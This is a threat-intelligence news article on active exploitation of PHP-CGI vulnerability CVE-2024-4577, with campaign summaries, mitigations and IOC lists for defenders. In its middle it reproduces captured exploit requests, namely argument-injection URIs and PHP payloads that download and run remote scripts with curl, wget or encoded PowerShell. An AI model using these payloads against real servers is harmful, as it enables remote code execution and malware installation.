A critical vulnerability in PHP, tracked as CVE-2024-4577, is being actively exploited by threat actors in wild just days after its public disclosure in June 2024. The flaw affects PHP installations running in CGI mode, primarily on Windows systems using Chinese and Japanese language locales, though it may impact a wider range of setups.
The Akamai Security Intelligence Response Team (SIRT) has detected numerous exploit attempts targeting this vulnerability within 24 hours of its disclosure. The ease of exploitation has led to quick adoption by various threat actors.“One of the factors in determining criticality is the ease of exploitation, and this one is pretty uncomplicated for a threat actor to execute. To achieve RCE, an attacker just needs to send PHP code to the server and have it be (mis)interpreted.” Akamai said.
Malware Campaigns Leveraging the Flaw
Akamai researchers have observed the flaw being abused in multiple malware campaigns, including:
- Gh0st RAT: A 15-year-old remote access tool was used in attacks originating from a server in Germany. The malware renamed itself and beaconed out to a command-and-control server.
- RedTail Cryptominer: A cryptomining operation was detected abusing the vulnerability to retrieve and execute a shell script that downloads an x86 RedTail cryptomining malware.
- Muhstik Malware: Another campaign downloaded a variant of Muhstik malware, which targets IoT devices and Linux servers for cryptomining and DDoS purposes.
- XMRig: PowerShell was used to download and execute a script that spins up the XMRig cryptominer from a remote mining pool.
Within 24 hours of disclosure, SIRT observed Gh0st RAT malware attempts targeting this vulnerability. The malware, a UPX-packed Windows executable, beacons out to a Germany-based command and control server and renames itself to evade detection.
RedTail Cryptominer
SIRT honeypots detected a RedTail cryptomining operation exploiting CVE-2024-4577. The attacker used a shell script to download and execute the cryptomining malware from a Russia-based IP address.
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Linux; Linux x86_64; en-US) Gecko/20100101 Firefox/122.0
URI:
/hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input
POST DATA:
<?php shell_exec("SC=\$(wget -O- http://185.172.128[.]93/sh || curl http://185.172.128[.]93/sh); echo \"\$SC\" | sh -s cve_2024_4577"); ?>
Muhstik Malware
Another campaign involved a shell script downloading Muhstik malware, which targets Internet of Things and Linux servers for cryptomining and distributed denial-of-service (DDoS) attacks.
User-Agent: python-requests/2.22
URI:
/?%ADd+allow_url_include%3D1+-d+auto_prepend_file%3Dphp://input
POST DATA:
<?php system('curl 86.48.2[.]49/3sh')?>;echo 1337; die;
XMRig
A fourth campaign involved XMRig, where PowerShell commands were used to download and execute a script to spin up the cryptominer from a remote mining pool.
URI:
/test.hello?%add+allow_url_include%3d1+%add+auto_prepend_file%3dphp://input
POST DATA (Base64 Encoded):
<?php $cmd=base64_decode('cG93ZXJzaGVsbCAtQ29tbWFuZCAiJHdjID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDsgJHRlbXBmaWxlID0gW1N5c3RlbS5JTy5QYXRoXTo6R2V0VGVtcEZpbGVOYW1lKCk7ICR0ZW1wZmlsZSArPSAnLmJhdCc7ICR3Yy5Eb3dubG9hZEZpbGUoJ2h0dHA6Ly9kb3dubG9hZC5jM3Bvb2wub3JnL3htcmlnX3NldHVwL3Jhdy9tYXN0ZXIvc2V0dXBfYzNwb29sX21pbmVyLmJhdCcsICR0ZW1wZmlsZSk7ICYgJHRlbXBmaWxlIDQ5dzhnc0x3N1V3VVZzelVCdFl1amROMU1jTmtvZVl1Y1RjdGFlUFg4bm1iaktBQnpKOVMxcmlnV2RoNUVpVVQxejROUEFQY2h4VDdSYUpYTjNmVVJVcE02RjZLR2p5OyBSZW1vdmUtSXRlbSAtRm9yY2UgJHRlbXBmaWxlIg==');system($cmd) ?>
POST DATA (Base64 Decoded):
powershell -Command "$wc = New-Object System.Net.WebClient; $tempfile = [System.IO.Path]::GetTempFileName(); $tempfile += '.bat'; $wc.DownloadFile('http://download.c3pool[.]org/xmrig_setup/raw/master/setup_c3pool_miner.bat', $tempfile); & $tempfile 49w8gsLw7UwUVszUBtYujdN1McNkoeYucTctaePX8nmbjKABzJ9S1rigWdh5EiUT1z4NPAPchxT7RaJXN3fURUpM6F6KGjy; Remove-Item -Force $tempfile"
Mitigations Recommended
Akamai advises affected organizations to patch their systems swiftly and monitor for indicators of compromise (IOCs).
Those using manual mode should ensure the Command Injection Attack group or specific relevant rules are set to “Deny” mode. Akamai has observed a surge in scanning for this vulnerability and is continuing to monitor the situation closely.
Join our free webinar to learn about combating slow DDoS attacks, a major threat today
.
Indicators of compromise for SOC/DFIR Teams
Gh0st RAT
SHA256 hash
A646ebf85afa29ae1c77458c575b5e4b0b145d813db028435d33b522edccdc0e
File names
- A646ebf85afa29ae1c77458c575b5e4b0b145d813db028435d33b522edccdc0e.exe
- phps.exe
- Iqgqosc.exe
IPv4 addresses
- 147.50.253[.]109
- 146.19.100[.]7
- 23.237.182[.]122
BangCloud linked IOCs with hits on VirusTotal
- 147.50.253[.]220
- 147.50.253[.]222
- 147.50.253[.]225
- 147.50.253[.]219
- 147.50.253[.]231
- 147.50.253[.]99
- 147.50.253[.]100
- 147.50.253[.]228
- 147.50.253[.]5
- 147.50.253[.]4
- 154.197.12[.].156
- 147.50.253[.]110
- 147.50.253[.]102
- 147.50.253[.]218
- 147.50.253[.]23
- 147.50.253[.]11
- 147.50.253[.]163
- 147.50.253[.]2
- 147.50.253[.]116
- 147.50.253[.]18
- 147.50.253[.]109
- 147.50.253[.]106
- 147.50.253[.]112
- 147.50.253[.]111
- 147.50.253[.]7
- 147.50.253[.]104
- 147.50.253[.]167
- 147.50.253[.]119
- 147.50.253[.]113
- 147.50.253[.]103
- 147.50.253[.]107
- 147.50.253[.]105
- 147.50.253[.]114
- 147.50.253[.]108
- 147.50.253[.]101
- 147.50.253[.]117
- 147.50.253[.]115
- 147.50.229[.]12
MITRE ATT&CK techniques
- T1091 — Replication Through Removable Media
- T1547 — Boot or Logon Autostart Execution
- T1056 — Input Capture
- T1112 — Modify Registry
- T1003 — OS Credential Dumping
- T1120 — Peripheral Device Discovery
- T1027 — Obfuscated Files or Information
- T1071 — Application Layer Protocol
- T1082 — System Information Discovery
- T1571 — Non-Standard Port
- T1057 — Process Discovery
RedTail
IPv4 addresses
185.172.128[.]93
SHA256 hashes
- 2c602147c727621c5e98525466b8ea78832abe2c3de10f0b33ce9a4adea205eb
- 0d70a044732a77957eaaf28d9574d75da54ae430d8ad2e4049bd182e13967a6f
- ab897157fdef11b267e986ef286fd44a699e3699a458d90994e020619653d2cd
- 9753df3ea4b9948c82310f64ff103685f78af85e3e08bb5f0d0d44047c63c315
- 19a06de9a8b66196fa6cc9e86824dee577e462cbeaf36d715c8fea5bcb08b54d